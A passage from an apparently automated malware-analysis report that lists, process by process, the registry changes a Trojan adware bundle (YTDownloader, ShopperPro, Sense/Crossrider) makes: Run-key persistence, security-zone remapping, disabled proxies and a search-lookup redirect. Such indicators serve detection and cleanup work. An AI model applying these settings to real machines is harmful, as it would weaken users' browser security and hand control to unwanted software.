"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx, 1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\AniGIFPpg2.AniGIFPpg2.1]
"(Default)" = "AniGIFPpg2 Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\YTDownloader]
"Aff" = "obrdc1_0_0_0_0,99999999-9999-4bd6-97ff-f15d28801c02,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCR\AniGIFCtrl.AniGIF]
"(Default)" = "Animation GIF Control"

[HKCR\AniGIFPpg.AniGIFPpg.1]
"(Default)" = "AniGIFPpg Class"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
"Version" = "1.5"
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\YTDownloader]
"Aff" = "obrdc1_0_0_0_0,99999999-9999-4bd6-97ff-f15d28801c02,"

[HKCR\AniGIFPpg.AniGIFPpg.1\CLSID]
"(Default)" = "{6DC82D15-92F2-11D1-A255-00A0C932C7DF}"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\0\win32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 44 DD C2 0B 06 33 A0 BE 23 D6 62 BF EE 9E 36"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\YTDownloader\Video Converter]
"Install" = "%Program Files%\YTDownloader\"

[HKCR\AniGIFPpg2.AniGIFPpg2.1\CLSID]
"(Default)" = "{61AB12E1-A5FF-11D1-B2E9-444553540000}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Verb\0]
"(Default)" = "&Properties,0,2"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
"Version" = "1.5"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\MiscStatus]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AniGIFPpg.AniGIFPpg\CurVer]
"(Default)" = "AniGIFPpg.AniGIFPpg.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"XMLLookup" = "http://www.fileextensionpro.com/redir.aspx?s=obrdc1_0_0_0_0,99999999-9999-4bd6-97ff-f15d28801c02,&LangID=x&Ext=%s&"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\FLAGS]
"(Default)" = "2"

[HKCU\Software\YTDownloader]
"Version" = "1.0.8654.1137"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"DisplayIcon" = "%Program Files%\YTDownloader\YTDownloader.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"net.exe" = "Net Command"

[HKCR\AniGIFPpg2.AniGIFPpg2\CurVer]
"(Default)" = "AniGIFPpg2.AniGIFPpg2.1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\MiscStatus\1]
"(Default)" = "131473"

[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCR\AniGIFPpg2.AniGIFPpg2]
"(Default)" = "AniGIFPpg2 Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCR\AniGIFCtrl.AniGIF\CLSID]
"(Default)" = "{82351441-9094-11D1-A24B-00A0C932C7DF}"

[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}]
"(Default)" = "IAniGIFEvents"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"DisplayName" = "YTDownloader"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"Templates" = "%Documents and Settings%\%current user%\Templates"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\ProgID]
"(Default)" = "AniGIFCtrl.AniGIF"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}]
"(Default)" = "AniGIFPpg2 Class"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Version]
"(Default)" = "1.5"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Verb]
"(Default)" = ""

[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}]
"(Default)" = "AniGIFPpg Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"

[HKCR\AniGIFCtrl.AniGIF\Insertable]
"(Default)" = ""

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"sc.exe" = "A tool to aid in developing services for WindowsNT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\YTDownloader.exe]
"(Default)" = "%Program Files%\YTDownloader\YTDownloader.exe"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\HELPDIR]
"(Default)" = "%Program Files%\YTDownloader\"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Programmable]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"MaxConnectionsPerServer"
"MaxConnectionsPer1_0Server"

The process setup.exe:2104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A AD A0 20 59 57 B2 E1 CA 08 08 24 36 FB 5E 73"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ShopperPro]
"UninstallString" = "%Program Files%\ShopperPro\SPremove.exe"
"DisplayIcon" = "%Program Files%\ShopperPro\ShopperPro.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ShopperPro]
"DisplayName" = "Shopper-Pro"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ShopperPro.exe]
"(Default)" = "%Program Files%\ShopperPro\ShopperPro.exe"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa6.tmp\AccDownload.dll,"

The process Rripitpko.exe:3324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"CrPublisherId" = "20891"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"CrAppId" = "70299"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Crossrider]
"Verifier" = "67a1823aa892cacdb48c5c33d8b81ea2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891]
"70299" = "Sense"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"UninstallString" = "%Program Files%\Sense\Uninstall.exe /fcp=1"

[HKLM\SOFTWARE\Crossrider]
"Bic" = "03a471124f01b8b4a21fa91e866e62edIE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayName" = "Sense"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Crossrider]
"Bic" = "03a471124f01b8b4a21fa91e866e62edIE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 E2 F7 90 5D 24 66 C9 AC 6D 60 58 57 AB D5 EE"

[HKLM\SOFTWARE\Crossrider]
"Verifier" = "67a1823aa892cacdb48c5c33d8b81ea2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\InstalledBrowserExtensions\20891]
"70299" = "Sense"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayIcon" = "%Program Files%\Sense\utils.exe"

[HKCU\Software\InstalledBrowserExtensions\Sense ]
"70299" = "Sense"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"Publisher" = "Sense "

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayVersion" = "1.36.01.22"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process find.exe:2308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process YTDownloader.exe:2468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\YTDownloader]
"UserId" = "{FE7C500E-E7F2-4E77-A4D1-6A1E9A62EBFF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 1D 3C 4B C0 1D 99 5D 0F ED B8 31 2E C5 9F 1B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKCU\Software\YTDownloader]
"UserId" = "{FE7C500E-E7F2-4E77-A4D1-6A1E9A62EBFF}"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process tcpsvcs.exe:2312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 4F 44 4C C9 F3 6F 47 11 B0 D8 3A E4 F1 AB 43"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The process Dazifrnw.exe:3296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"UninstallString" = "%Program Files%\Ge-Force\Uninstall.exe /fcp=1"

